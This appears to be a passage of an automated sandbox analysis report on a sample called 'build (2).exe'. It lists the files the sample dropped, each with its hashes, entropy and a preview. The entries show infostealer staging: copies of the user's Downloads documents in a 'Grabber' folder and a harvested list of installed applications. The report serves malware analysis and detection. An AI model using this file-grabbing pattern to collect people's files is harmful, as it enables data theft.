Preview:	GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Downloads\IPKGELNTQY.jpg

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Downloads\IPKGELNTQY.xlsx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.695505889681456
Encrypted:	false
SSDEEP:	24:H4n3oQ37aNEo3/q02YbYK7OUQV8AZfGyzIie/8sE4StAYwrHEJyput:lQLaNh/qYnqUQ5ZeyMt1PTYYE7t
MD5:	3E1BF32E65136B415337727A75BB2991
SHA1:	4754D2DD51AEC8E287F0F298F5A81349578DEB56
SHA-256:	448E0EE938A14EF0F54CD6AAA94E2AA58F26558AAEF43BCC1C7F6FE9C603AE3C
SHA-512:	16F40CD1EDF14D55FACB7B9F180AB3C15C32ED4D80F8A9BAC35B1206A90AA9020D775CDA79F373207172538F23A3B52CE68AFFDFC8AC0F201DBF66D161324959
Malicious:	false
Preview:	IPKGELNTQYHQHGSHTPVWARIQFFDQORBEAICRKYCMKCXOXXEZGTFPWNNYGPFMKJKYFMMDIYXFPDOMBUDXITLFWFNVSJRIAXRYMLZEPFASMBUUMHSRRLMZJYFXBEPILYMGACOAQPURIVFPPJQEWFFWRSBDUYBRHRQONMSPELPXDMBXGBYAQIXAGRJFVIEFCVQMEYPHNUGZVQZGMYFQDUEJFFVRANZMOWZSXHATKNDJSCSYQCSVORWZGVNXHCCVTVXUSTTNQGIBVVEASKHFQJLYWHNGMDFBPGBIVVSGARAGVHEQCRHFMQXIJRNMYBNMUXCXQROMUPEUKSZABJKSEWSTNNIHBMZJFZNQVGTZUHBTFTSYYLDOVYEGPGJZRBAGPLIGCKRPXPYOWRHETLSOZVBYHRETVQLIMHTQPKGOCBKUYOLJZDOKGWRFQOSAZZOKLBEDXRWWNPXEVYADKHEARRQKGVCXSZZEJJJAZQDIVIMVVZFXGYSUUWBEYMJHWICDGVMEUXRRQBQJJOLYEAHPQEGMERBBWLEKEZLHILACOGIONOUUOWVNOJDHHKPOYOWHPFROVZLCENWHOIFGMGDYTSFECEZHAPOSJJNPIRBMBSDXOFYGBVMSBNIDOSAVRNDLNDJZMZCAQUSVGNXTEKMYXIWGQEQDOPFTVRTHSKPYBKBCJARGRESALYRKPLCXZIJRPIBTTGGUENCBAZXYIBWQIXAJPVAXKTYVZRUXZCFIDVTNWMPXGAYBSCEPNQXLHQTLBYMVJSMALADRFIWMKSEOZRQYITESWEXICOXXMXZXPWVULPMMHOPDLDXEMEXYRZEUCQJPJZNAZTRVKWMOOGPPMJYUHGJMUBQNLYTHTYZWZDOKLULRNVLQCAZOMDBIJFZZXMRXBQRSDDZHUCKCBRVVXURBLRSUHNXYBTWNVXAXHYOTXEHGOSZEIBZKYKVIKEAYNYYXUMKQOCFGPPNGBWATQESKSZNRGDARGSXCHFMUHWDN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Downloads\LSBIHQFDVT.pdf

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698193102830694
Encrypted:	false
SSDEEP:	24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
MD5:	78472D7E4F5450A7EA86F47D75E55F39
SHA1:	D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
SHA-256:	2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
SHA-512:	D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
Malicious:	false
Preview:	LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Downloads\MXPXCVPDVN.docx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Downloads\MXPXCVPDVN.xlsx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.698669844484375
Encrypted:	false
SSDEEP:	24:7mMbmx9UKbA2JHc6cqYGtPrmwXr33hecYrnpTGwrhq0Lf6iNXQp:JI68rJcqjPSwXzRecYhGKq0LLG
MD5:	4FCF725C73B93BE52C2E1CD48AC3A562
SHA1:	98118BDED7CC2397C19310A914C6CA6B39CC47DE
SHA-256:	3803B68C31F1D6091C8D35F7B737B363C99ABED15B65899869E2A5AFA443D2C4
SHA-512:	8EDB10C8C81284109073EAABDB337F2AF5428AC5A50DE4999B61792D434D099124DF2DB5B2F58E9FC6335EA2E6F474291F8726DEF293A409418CDE6E0D5D7CFC
Malicious:	false
Preview:	MXPXCVPDVNZDMRYXKAXPKZSKXQENMVJGASOKSKKVKMVTFWCKJVQUEHFJLYGAGVTAPSEFWLYDESGESNCQQMFQIJOIYCFNJODSXZOERROXNDWXBZRWZFOKQBPLORLXBDLECIGMCKVUGLWKNMZJBHPGARIQDCSYHCPUKBGABSYSPDCWIMLINBEYVYXKDRVQIRPITEAVGQTKEJGNRGJGNMXLAZZZEOVLCHVHUAHQLECFOLMZPDMGFZOZZRCUGUGQXZRQEEYVPMGAXSRCPXPOCBVPESPOAHTWHHDKCHMXTJCJJDRFYUOIUWGYDNCJXDYQFYCADMQIYTSLSIQVEMFCENTOHNQNWXMKIUOZDFCOFDXWRGCINHQCHYKQMLGTDJSTFEPKLURPPUWEFYLYEFPSNQGBKUZJQDAVMAFGFXHFNGMNUPXAYGABBOYSAPGCMGQZYDGMRINVJWRFASDKOFXOQBOCWTMIFSMCIGFJLECWNXSPKYYMZPZTTKDCIUUBZTJKBGNEDOBUUIKPGSXPUUDSIAYBARDMCGXUVFSTYNWEUHFOSOADWNJSVGVNYVPTFIEGPCWGLEJGVLKBVQHFEPYYRMGWPMKQWLBOAFFRZQRDMFIHCLMXYKGCSNXZKWIKKIILSRZRKNKBMQKPDNBOSZDCMCNAMVOVGTUYRVJHPAMTCIPJHQZLFPQNHPQQTDAETXQMKGTZQPDKQISDDHIQFGGWJPCMAAAGGRYLKNAQHJDFVXQSDDSPCOTQDHQLRMFKVLQAFIBPIEJVVBHAMXWNJDJUFWZAUYOGKLIJAKPXHFCOGJJVGZXSWYIBAKNZMMSVHMHLNHNJCCWYZMEJWSAERLVHQEHUTACSGGGRMLAWNQTJDBBGLANCZUNRXUOYFLZHFFWFLDWPBOZWIRWKAIWLBOQNNKCSLPLMPBIDNPIJQEDKYXMBPUFPZCWHQURUYJBENNRMTLHPICTOSJUUPWITJRCCXDXEHQQYLVPFNZKWXNGEGYNB

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Downloads\NEBFQQYWPS.png

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.692704155467908
Encrypted:	false
SSDEEP:	24:zrCxfe2LWgi+vQ2TVmOkCRMqftTB+IkHJMBxmT+gmPrwxYu:zSLpN5mOhMq1NUHCLm0Mx/
MD5:	D0B81B6D51E4EDDB3769BCE2A5F1538F
SHA1:	08D04E7E91BD584CC92DB2586E3752A6E50FF2A7
SHA-256:	18CE24DD08DD5F5AC0F5CECA3D6551DFDBBD4893A4A9A9A9331E8ADB67061A33
SHA-512:	CB9E881EE3E57B79597C4AD35D24CBF490882CAB222FD687E52B01798E643876D97A51BE67CBB9AC8CD21EAEC8383FF822569E8E523B165607D328FC53E97B80
Malicious:	false
Preview:	NEBFQQYWPSTEXBZIDUTTATZZTFWRABRJBLLCZYJOVRXHUMPDHEGQDWTHPNRIJXJXBUSQEVJKULMLPCAPCSHFUPDJCEAANNYOFDUHLLLHOVFNKNTRVWZEFIUBXRXIMRWXDPWVTFKQMGYNRABMTANRGGSLGEIOAUBQFQTLCZWMEHWOZIIQMRJLAHLXPXNJVCGLENXDTBFKZKJLYBJRCHNDCSDKFOXIBOZTNXJYAJRSBBQPGAKTHVHMQLXYQGBGJEKXNNJBZRONCQRXSXGBODHFEHXLSDNKZKOYGQWTAWCYFZWCAASDECKZAPFZVLHUZNKAOEOFXYACNHCKLJCQBGVLWGGJAXFSREDNBXZVKQXDJSDSXQALVYBQAWFRFADSUOUAJLGHBNXRJZTADMFYSWTEEFNLTNZQFEUIHOMLHDFXIINXAWFLMBVWLQALRTVDAZZJLUPLSSAEVUHCENQHZDZHUFSLZAWTBWUIZXADMDJFNIGCMGZAUDXHJYRRCZLEWREZLOERQDDSEKREDPHBBKIUIEJMDLPLKXBZACMCVBOXPIUSWSAYGLJYPERFESVJDFDUCRRMCERYFAOHUKEWBRHIXVALIOBSUZIVKQJYQBYWWQBTQFSMFCMHHJGZWZAIAVHBXGYJSOQFKNTZPVJPXHVDUHZBGDUQFSTVAISEPGJPRFXXECIDSLUEKKGYCYYRYPCKPELJNUUBXKUPANFFQZXZCHJZGUXECSVNTCLQWVYUIUXXUHBVRWGMIPLLBTOOJWGEFGIBSTEOEUCIBZTYLFTDGDCLFGIIEJZNJQROHSUVDJWKISAIRTACFAGNSREZROONUNTUTBQDAEWKYIKLSDTXHQQYMOCADIFSSOJPAJKIYLOJZORJLSPXKKVUAEDRRGACWHBZIGNBZSFLRWHTOKEKQVLZFXTYGAOTMFRKSVLKIISUBYUBNXKHYRNKANSRGPAEMLRECJWZZUGCQATTLPPBVLBJPOLHBERJWQJMJGFN

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Downloads\QCFWYSKMHA.png

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.702247102869977
Encrypted:	false
SSDEEP:	24:GwASqxXUeo2spEcwb4NnVEBb2Ag1EY9TDqVEQXZvnIx+:nAD1U6+Lwb4dV42x1EIeVlXZ/5
MD5:	B734D7226D90E4FD8228EE89C7DD26DA
SHA1:	EDA7F371036A56A0DE687FF97B01F355C5060846
SHA-256:	ED3AE18072D12A2B031864F502B3DA672B4D4FA8743BEC8ADE114460F53C24D6
SHA-512:	D11ED908D0473A6BEA78D56D0E46FC05DAE642C6ED2F6D60F7859BB25C596CDAA79CC7883FEA5C175A2C04BD176943FF45670B19D6A55B3D5F29FAF40A19AC20
Malicious:	false
Preview:	QCFWYSKMHARLAFTMDAYCDPDNVLLXYAHYJQVDDKWMWZXTODMVQHOWYAKZGPKJEHLDEADLWAOYFHCRBONQYOLNJKXLXXPSVNNBUMGSSHSRYIKKLNWBJSSZQFZBFWIPYYALBWYXPUCHCBPPPRVICZHAAXDBSBDAFSJSLRPZCKMILDLKTZJTTJWTRDUXPIOSWYRPJKVLJAGHSGEPPERRAQLAJLIRGZPORRNBHIKYMYWHJJKNXIQOPDJPXFLFPWXDCSZYFDTACTIFVHTTSPLEYMJQGMJBZKBTPKCSRPHSAJZDKKKDYFDICXMYAQSFGBCKRXTFXXUYCXPOOHXIGGOZQXUOJXGUHUEOJLEOQQRFQRNQSWAOWAWOUVFMKBPTZVBCGRCYEHPXUWCDBHICKJYVGTNPPMEWNTSWYZNREIVBOXSICNBJXTOOMRYUPEHBVWMTIZHWLGFFTIUYFBQKZOWLOZMSGJFBUHXKMGISFGKCABOUUUQJAUODQPPYPQJGLZVADLCCGHPBEUWSDDXYCCQVTRQWCEJDTNAGHKGJTRWVAQBQJBUQWMJRXXASIQFFIUCPKMEXTJTVBDCBEYZDLKHCHQXMUBNRVRITBTYGULZYWAXVJAXNQEPONBFIAUWZCXQYHHPHZWKKUTNXAQELCSUFKXKKQLLKNVNOREOWTEVCFHSUGPNRMAPAFPTHPGPAJPOCFBZXTIYQYUSEJFOUEZDUJSRXDHTOZAMMNCCIXWLXFQZALVARMPTDBNFJAJUMFQAHUJVWMEIDRIMZQXYHMCNBVLONHTHCXFAKSQBBXFBBFYSTIWNRKGOIHMIHZKIQSYCSFIRGLYFATERWSKAZLTFNMKHFVBLMXNERMNYZHBEYHNFPIPCGHZZMBNNYITUETKSXMZHNSGROLAGIITATFDCBZCBLYQHHYFPBDWGCTQNYPHDHFBNVEJJDIVMSPKDXKQBUNSMLJDVGOKQUEVKEVEUUSGEQJDKGYLPIDXNBIPBAJRUU

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Downloads\SFPUSAFIOL.pdf

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.696913287597031
Encrypted:	false
SSDEEP:	24:TEp0dGAR5tKV4V1dnQcncjGi20QoVwGQqh3:20Iw5tKOncjGUwra
MD5:	44ECF9E98785299129B35CBDBCAB909B
SHA1:	4D92AFB00FE614CC8B795F1AF28173DBE76FE7F5
SHA-256:	06E706536CB7D543E6068C98C90721CAD89C23D16D37444F46F9B01C4380DF9E
SHA-512:	1FA347223014BB3AC0106948B07E337B1A98C0BA2D98AC0ADD821D1B3CE9F75681F6383925F5E614F36750C5B9FB92D1C8EEEDC05469FBC6EA3F281D8B52B556
Malicious:	false
Preview:	SFPUSAFIOLDMTRNUTGNTJUWFCWSZSHWEDVXRKVRQQJURAYWLWUUBTIKENFOXKWAEIMQEIZNZNRADQPATZGCMDPRDXLQGZUFJZGZDRTSVNCHAUPMRLPRPZKGVAVXYEVCKEHKMMJGKSJOOUYGYLDDIEYHRSUUPROPBGJMTERPOAVKYFPSCESRJNQZFKBQPUDQDDUMCFWKLZTOAKIRCBYNHNUNDHQGUCZFGLFAWYRAYVDHRMGQXAXAOYSCNPGEKEPCMQBIHRFANOHHAWKRVIORZYSDKULQZFRPSGFVYRDRVLMMPKWJDXUOEBNLILNONKXLMXLVIUCYNNQGCPDXMGSCUEKRTGZJHMNRUEKEIJFJIAHVLHOVPEFBBLWOKZSZSYSSOQIMAXYTLNUMGPOHCVAJUEBTRJRPRJCOTKTDCOEZCJXDLESVDTKVOFQWENRQDQXACWTCILXCPGHHUNHJNQLPPCERJAOCZFIXIHZKTCKZMXYDXVVFZUURETLUVBDNYJHWBIGQTEBATUDWNJLGPYCGIXUBQTVJPDRWVOFIQDYMJOMWUQUNCHQWGETEEEIJZNHHUYACVFRBGSWATTYVHFTURPBDTDDQTWASRBMLCMLRKIGMHWRHHHUVZTGIFNIDBHRKNFOYFIOYERMIXFEIANSZHVUVBFJOQNNJGQUNDLTPKRMYXNUHBOFQLLIDRDFMIAAVQNNXFNDRFBIGEVUSBEJUVVSTEJYKSAUCFDNNJQTSVXAUBHAPFHJIYCNFJQPWEXKMUQRCKERPSFCQKHEDKHHRNWTLAMXHJLOSIZOKYIMDHNEIBAUBKXVXZVXMAZNFTTYQGDGZHKLIHZJNIVHVZHYMNESIMFITKHGIPXKXZDBLBTKTNZDKZTKDHQQJCJDTRVKOCTCXPMDLKSOBGZSQQUTNFYYEOCJVZSZUSESOBKMIJSKKSXTXITISLBTMALAVZEMHXQXVRBZCDKLOKWDYQIEQCKFLKBMPLIQMKDTJPRHOW

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\Grabber\DRIVE-C\Users\user\Downloads\UOOJJOZIRH.docx

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	1026
Entropy (8bit):	4.694311754777018
Encrypted:	false
SSDEEP:	24:A8RGU2wNw6pbc5fP6UBtRzjn+4sNp3GYuf5/4dImDNR4+R00JOGJP89a:Aw4w9h+fiUBtJj+44pc3mDL4+R0MVJ/
MD5:	61908250A5348CC047FF15260F730C2B
SHA1:	CBCF34156EAE25B328A926E21008598EE8D1CBDE
SHA-256:	8700BF8369D39FD5DF142F9482CE8860BD8A26A3304EFBC57CBF9E45782C7A3A
SHA-512:	BCAB9A36BF1111B05BC52D8921CAC19ABC0FA18D93EA4EB9866DF4B31624FFCA2FF55A09C5051DC2AECAB18828BA8FDA5F31FA0F1E1B7CDC51DF39041E2A82F3
Malicious:	false
Preview:	UOOJJOZIRHPVBWNJCWUSWUNTMYTRIXAVHMVNTYLIPCAYUDIDHLMFMKJROINQAVRXUZLNINNJJSHFEFPSZPLVVWBUDRECRECFHEVVEZDHIFPUKQTLDLWAAKNHNLRQDSPWEEVMZICDCINAORJHMIUUNNJHMWJLZHCNXQIZIPHJPLEDKWATEVYJSWRRMCEJGQXHFBOGXKHJFORHFMGMLTTZJKPJBYMKZVWGZAIGHCFNXGRNDDLJZMCZBXDTQVGPSMNLFNFDHXXCXDJJUNSVHDRBZEZFIUQIYSJVDHEFPPPROTSFKVYAURVOKTIKGYYSWJMCPHHISKCOIVXEIQWZICSWMZJVHXNBACFJZRIEQPOISHMZILEXPCMYBSQRASRNWPSMMYPWJFEXHUUJQAMZDZSIKVETWBZUQBTDCCOYIIJFYYHXPZIUCZRQQFYTKLLGWQPTPZJIZHUEFVCDUNPMVORWJRIAYGRRAHBFWKSAMTDEVSHQXJBHBMOINFGNSRFJDWPSMFABPWRZHIOIPNMLHKGNVWQJYVTWLEZDGMBOJLNHPJKWMHWBVAEGELRTQORSRZQBNXOXEHQJHOEQVNZZJSGWQGINLWNPWFSJNPGRBFOBAEJAOEEMVKZTQZEVVODQLWGPNPNOPXEXLEESZERAPVAPHAUNNCEHTNMFJYBTYGSNGBIEDWGUTNCJDESWGYITWPGBEFVMZYUYPQOQBFITFPUQTWZNQFLWVTMUIAOXBCINJDYCHTXVFQFJQSMNUTYABAAOGGEUKHMDYKLCSGIBIFQSYOIRBUYVSCPDGMVNAQBKZPEKHNRNDPIHOUUTPJDKDOACRPOMZOQCOIAOBNPJLJIYDLQLQUMPIRAMVWNBCMMWFDLTUGWRDVGNHOOODYTHAGWDMJKRVJZFYCVLFLQUWEILFSEPBEADHBHFVWZGUZKNXQCRSBRLGIVTWCSHGFTTTPQAKFWFDXDYXWAWDKWXXTMSJSVOBRAYZGGBDPJOGLIZ

C:\Users\user\AppData\Local\64d39ff210296b837e1db84238c1d61c\user@585948_en-US\System\Apps.txt

Download File

Process:	C:\Users\user\Desktop\build (2).exe
File Type:	UTF-8 Unicode text
Category:	dropped
Size (bytes):	7409
Entropy (8bit):	5.35202258830731
Encrypted:	false
SSDEEP:	192:/J+AJ+nJ+FJ+KJ+mJ+IJ+JJ+CJ+wJ+0yJ+0J+dJ+3J+fcJJ+deJ+deJ+XJ+oJ+Ax:/JFJIJQJtJTJlJYJBJ7JKJhJSJ0J2cJS
MD5:	2B1B7DF09A897DD10D3C89ACD7D87704
SHA1:	F0348DFEF229DB73CD513EC5E604F8BA2F934571
SHA-256:	3B762AFA6E74F06A8B17D5AFAB6A82225DF50E55251DF50306680BF750CA1D8B
SHA-512:	113709E19F59249D9DA76D14D3B55C74ABB8424C078DBC978AB198B4BAEF7B676626199269030CEC2654F2592C6FDAFD149267424E3A4E9FAC9CFB274F4FD78B
Malicious:	false
Preview:	.APP: Microsoft DCF MUI (English) 2016..VERSION: 16.0.4266.1001..INSTALL DATE: 09/02/2023 19:18:43..IDENTIFYING NUMBER: {90160000-0090-0409-0000-0000000FF1CE}...APP: Microsoft Office Professional Plus 2016..VERSION: 16.0.4266.1001..INSTALL DATE: 09/02/2023 19:18:43..IDENTIFYING NUMBER: {90160000-0011-0000-0000-0000000FF1CE}...APP: Microsoft OneNote MUI (English) 2016..VERSION: 16.0.4266.1001..INSTALL DATE: 09/02/2023 19:18:43..IDENTIFYING NUMBER: {90160000-00A1-0409-0000-0000000FF1CE}...APP: Microsoft Office OSM MUI (English) 2016..VERSION: 16.0.4266.1001..INSTALL DATE: 09/02/2023 19:18:43..IDENTIFYING NUMBER: {90160000-00E1-0409-0000-0000000FF1CE}...APP: Microsoft Office OSM UX MUI (English) 2016..VERSION: 16.0.4266.1001..INSTALL DATE: 09/02/2023 